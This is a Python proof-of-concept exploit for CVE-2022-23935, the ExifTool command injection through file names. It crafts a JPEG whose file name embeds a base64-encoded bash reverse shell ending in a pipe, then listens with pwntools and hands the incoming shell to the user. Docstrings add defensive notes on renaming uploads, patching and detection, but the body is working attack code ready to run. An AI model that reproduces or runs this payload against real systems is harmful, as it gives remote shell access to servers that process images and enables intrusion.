POC / CVE-2022-23935.py PY
#!/usr/bin/python3

from pwn import *
import base64
import sys

class ExploitExiftools:
    """Proof-of-concept helper for CVE-2022-23935 (ExifTool file-name command injection).

    The class does two things: it writes a small JPEG under a file name that
    is itself a shell pipeline ending in ``|``, and it then waits on a local
    TCP port for the connection that pipeline would open. The CVE concerns
    vulnerable ExifTool versions treating a file name that ends in ``|`` as a
    command to run rather than a file to read.

    Notes for defenders reading this sample:

    * The image bytes are harmless; the hostile part is only the file name, so
      scanning upload *content* will not flag it. Validate or replace file
      names instead (store uploads under server-generated names before any
      metadata tool sees them).
    * Upgrade ExifTool to a release carrying the fix for this CVE (check the
      vendor advisory for the exact version).
    * Useful detection signals: file names containing ``|`` or other shell
      syntax in upload/processing directories, a shell spawned as a child of
      the exiftool/perl process, and unexpected outbound TCP connections from
      the host that processes images.
    """

    def __init__(self,ip,port):
        """Store the callback address and create a pwntools progress logger.

        ``ip`` and ``port`` are kept exactly as passed in; when run as a
        script they are the raw strings from ``sys.argv``.
        """
        self.ip = ip
        self.port = port
        # `log` comes from `from pwn import *`; the progress line is reused by
        # the other methods for status output.
        self.p = log.progress("")

    def printBanner(self):
        """Print the ASCII-art banner to stdout."""
        # NOTE(review): this is a non-raw string containing backslashes that
        # are not valid escape sequences; Python keeps them literally but
        # recent interpreters emit a warning for them.
        print("""
   _____ __      __ ______      ___    ___  ___   ___        ___   ____    ___  ____   _____ 
  / ____|\ \    / /|  ____|    |__ \  / _ \|__ \ |__ \      |__ \ |___ \  / _ \|___ \ | ____|
 | |      \ \  / / | |__  ______  ) || | | |  ) |   ) |______  ) |  __) || (_) | __) || |__  
 | |       \ \/ /  |  __||______|/ / | | | | / /   / /|______|/ /  |__ <  \__, ||__ < |___ \ 
 | |____    \  /   | |____      / /_ | |_| |/ /_  / /_       / /_  ___) |   / / ___) | ___) |
  \_____|    \/    |______|    |____| \___/|____||____|     |____||____/   /_/ |____/ |____/         

                                            by 0xFTW                                                                                
        """)

    def generateExploit(self):
        """Write the test image into the current directory under a crafted name.

        The file content is a fixed base64-decoded JPEG; the file *name* is
        built from ``self.ip`` and ``self.port`` and carries the command.
        """
        self.p.status("Generating payload ....")
        # Shell command that would connect bash back to ip:port.
        cmd = bytes(f'/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1','UTF-8')
        # The command is base64-encoded before being embedded in the name.
        encodedName = base64.b64encode(cmd) 
        # Base64 of a tiny JPEG (the "/9j/" prefix decodes to the JPEG start
        # marker); the bytes themselves contain nothing executable.
        image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
        # The trailing "|" is the part the CVE hinges on: a vulnerable parser
        # reads the name as "run this and read its output". A file name of
        # this shape is a strong indicator in upload logs.
        imageName = f"echo {encodedName.decode()} | base64 -d | bash |"
        with open(imageName, "wb") as img:
            img.write(base64.decodebytes(image))
        self.p.status(f"Payload generated and saved as '{imageName}'")

    def starting_listner(self):
        """Listen on ``self.port`` and hand the first connection to the terminal.

        Blocks until a peer connects. From the processing host's side this
        appears as an outbound TCP session owned by a shell process.
        """
        # `listen` is the pwntools listener tube brought in by `from pwn import *`.
        l = listen(self.port)
        conn = l.wait_for_connection()
        self.p.success("Connected!!!!")
        conn.interactive()

if __name__ == "__main__":
    # Script entry point: expects exactly two positional arguments, the
    # address and the port that the class stores as-is.
    argc = len(sys.argv)

    if argc != 3:
        # `error` comes from `from pwn import *`; it logs the usage line and
        # is expected to raise, which ends the script here.
        error(f"Usage: {sys.argv[0]} IP PORT")
    else:
        exploit = ExploitExiftools(sys.argv[1], sys.argv[2])

    # Banner first, then write the crafted file, then block on the listener.
    exploit.printBanner()
    exploit.generateExploit()
    exploit.starting_listner()